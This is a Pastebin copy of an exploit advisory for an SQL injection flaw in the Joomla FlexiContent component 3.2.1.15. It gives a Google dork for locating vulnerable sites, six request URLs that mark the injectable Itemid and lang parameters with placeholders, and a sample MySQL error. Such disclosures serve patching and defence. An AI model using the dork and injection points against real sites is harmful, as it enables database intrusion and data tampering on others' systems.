KingSkrupellos

Joomla FlexiContent Components 3.2.1.15 SQL Injection

Feb 24th, 2019
54
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.60 KB | None | 0 0
  1. ############################################################################
  2.  
  3. # Exploit Title : Joomla FlexiContent Components 3.2.1.15 SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 25/02/2019
  7. # Vendor Homepage : flexicontent.org
  8. # Software Download Link : github.com/FLEXIcontent/flexicontent-cck/archive/v3.2.1.15.zip
  9. # Software Information Link : extensions.joomla.org/extension/flexicontent/
  10. # Software Version : 1.5 and v3.2.1.15 and other previous versions
  11. # Tested On : Windows and Linux
  12. # Category : WebApps
  13. # Exploit Risk : Medium
  14. # Google Dorks : inurl:''/index.php?option=com_flexicontent''
  15. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  16. Special Elements used in an SQL Command ('SQL Injection') ]
  17. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  18. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  19. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  20.  
  21. ############################################################################
  22.  
  23. # Description about Software :
  24. ***************************
  25. FLEXIcontent is an advanced content management system developed to
  26.  
  27. greatly enhance the native content managenent of Joomla!
  28.  
  29. ############################################################################
  30.  
  31. # Impact :
  32. ***********
  33. Joomla FlexiContent Components 3.2.1.15 [ and other versions ] component for Joomla is prone to an SQL-injection
  34.  
  35. vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
  36.  
  37. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit l
  38.  
  39. atent vulnerabilities in the underlying database. A remote attacker can send a specially crafted request t
  40.  
  41. o the vulnerable application and execute arbitrary SQL commands in application`s database.
  42.  
  43. Further exploitation of this vulnerability may result in unauthorized data manipulation.
  44.  
  45. An attacker can exploit this issue using a browser.
  46.  
  47. ############################################################################
  48.  
  49. # SQL Injection Exploit :
  50. **********************
  51. /index.php?option=com_flexicontent&Itemid=[SQL Injection]&lang=en
  52.  
  53. /index.php?option=com_flexicontent&view=flexicontent&lang=[SQL Injection]
  54.  
  55. /index.php?option=com_flexicontent&view=items&cid=[ID-NUMBER]&id=[ID-NUMBER]&Itemid=[SQL Injection]
  56.  
  57. /index.php?option=com_flexicontent&view=items&cid=[ID-NUMBER]:[FOLDER-NAME]&id=[ID-NUMBER]:[TOPIC-NAME]-&Itemid=[SQL Injection]
  58.  
  59. /index.php?view=items&cid=[ID-NUMBER]%3A[FOLDER-NAME]&id=[ID-NUMBER]%3[TOPIC-NAME]&format=pdf&option=com_flexicontent&Itemid=[SQL Injection]
  60.  
  61. /index.php?view=items&cid=[ID-NUMBER]%3A[YEAR]-[MONTH]-[DAY]-[ID-NUMBER]-[ID-NUMBER]-[ID-NUMBER]&id=[ID-NUMBER]%3A[YEAR]-[MONTH]-[DAY]-[ID-NUMBER]-[ID-NUMBER]-[ID-NUMBER]&format=pdf&option=com_flexicontent&Itemid=[SQL Injection]
  62.  
  63. ############################################################################
  64.  
  65. # Example SQL Database Error :
  66. *****************************
  67. No valid database connection You have an error in your SQL syntax; check the manual that
  68. corresponds to your MySQL server version for the right syntax to use near 'AND
  69. c.access No valid database connection You have an error in your SQL syntax;
  70. check the manual that corresponds to your MySQL server version
  71. for the right syntax to use near 'AND c.access
  72.  
  73. ############################################################################
  74.  
  75. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  76.  
  77. ############################################################################
Add Comment
Please, Sign In to add comment